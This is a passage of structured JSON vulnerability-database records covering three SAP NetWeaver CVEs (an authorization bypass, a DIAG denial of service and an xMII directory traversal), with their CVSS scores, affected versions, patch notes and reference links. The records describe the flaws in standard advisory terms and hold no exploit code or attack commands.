"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap_application_server:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3130"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jordan Santarsieri",
"sources": [
{
"db": "BID",
"id": "67108"
}
],
"trust": 0.3
},
"cve": "CVE-2014-3130",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.6,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-3130",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-3130",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-608",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ABAP Help documentation and translation tools (BC-DOC-HLP) in Basis in SAP Netweaver ABAP Application Server does not properly restrict access, which allows local users to gain privileges and execute ABAP instructions via crafted help messages. SAP BASIS is prone to a security bypass vulnerability. \nSuccessfully exploiting this issue may allow an attacker to bypass certain security restrictions and to gain unauthorized actions",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3130",
"trust": 3.0
},
{
"db": "BID",
"id": "67108",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20140428 [ONAPSIS SECURITY ADVISORY 2014-009] SAP BASIS MISSING AUTHORIZATION CHECK",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608",
"trust": 0.6
},
{
"db": "BID",
"id": "67304",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"id": "VAR-201404-0530",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:21:21.975000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1910914",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2014/apr/302"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2014-009"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1910914"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/67108"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3130"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3130"
},
{
"trust": 0.3,
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2014-009"
},
{
"trust": 0.3,
"url": "http://scn.sap.com/community/netweaver-portal"
}
],
"sources": [
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-04-28T00:00:00",
"db": "BID",
"id": "67108"
},
{
"date": "2014-04-28T00:00:00",
"db": "BID",
"id": "67304"
},
{
"date": "2014-05-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"date": "2014-04-30T14:22:07.250000",
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"date": "2014-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-04-13T20:01:00",
"db": "BID",
"id": "67108"
},
{
"date": "2014-04-28T00:00:00",
"db": "BID",
"id": "67304"
},
{
"date": "2014-05-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002335"
},
{
"date": "2014-05-10T04:06:31.937000",
"db": "NVD",
"id": "CVE-2014-3130"
},
{
"date": "2014-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-608"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP Application Server of Basis of ABAP Help Vulnerability gained in documentation and translation tools",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002335"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "67108"
},
{
"db": "BID",
"id": "67304"
}
],
"trust": 0.6
}
}
var-201707-1240
Vulnerability from variot
disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918. SAP Netweaver is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-1240",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.40 (disp+work 7400.12.21.30308)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "96874"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9845"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "96874"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9845",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-9845",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-9845",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-9845",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-9845",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-532",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-9845",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918. SAP Netweaver is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause denial-of-service conditions",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "BID",
"id": "96874"
},
{
"db": "VULMON",
"id": "CVE-2017-9845"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9845",
"trust": 2.8
},
{
"db": "BID",
"id": "96874",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-9845",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"db": "BID",
"id": "96874"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"id": "VAR-201707-1240",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:24:21.169000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "March 2017 (2405918)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/"
},
{
"title": "SAP NetWeaver disp+work Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=71678"
},
{
"title": "SAP_vulnerabilities",
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities "
},
{
"title": "radamsa-Fuzzer",
"trust": 0.1,
"url": "https://github.com/sunzu94/radamsa-fuzzer "
},
{
"title": "RADAMSA",
"trust": 0.1,
"url": "https://github.com/stephenharuna/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/hwangtaewon/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/benoit-a/radamsa "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-400",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://erpscan.com/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/96874"
},
{
"trust": 1.1,
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9845"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-9845"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2405918"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/03/14/sap-security-patch-day-march-2017/ "
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/400.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=55568"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"db": "BID",
"id": "96874"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"db": "BID",
"id": "96874"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-12T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"date": "2017-03-14T00:00:00",
"db": "BID",
"id": "96874"
},
{
"date": "2017-08-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"date": "2017-07-12T16:29:00.453000",
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"date": "2017-07-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-12-10T00:00:00",
"db": "VULMON",
"id": "CVE-2017-9845"
},
{
"date": "2017-07-19T14:07:00",
"db": "BID",
"id": "96874"
},
{
"date": "2017-08-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005885"
},
{
"date": "2018-12-10T19:29:25.063000",
"db": "NVD",
"id": "CVE-2017-9845"
},
{
"date": "2017-07-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of disp+work Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005885"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-532"
}
],
"trust": 0.6
}
}
var-201602-0121
Vulnerability from variot
Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0121",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001579"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-299"
},
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2389"
}
]
},
"cve": "CVE-2016-2389",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-2389",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
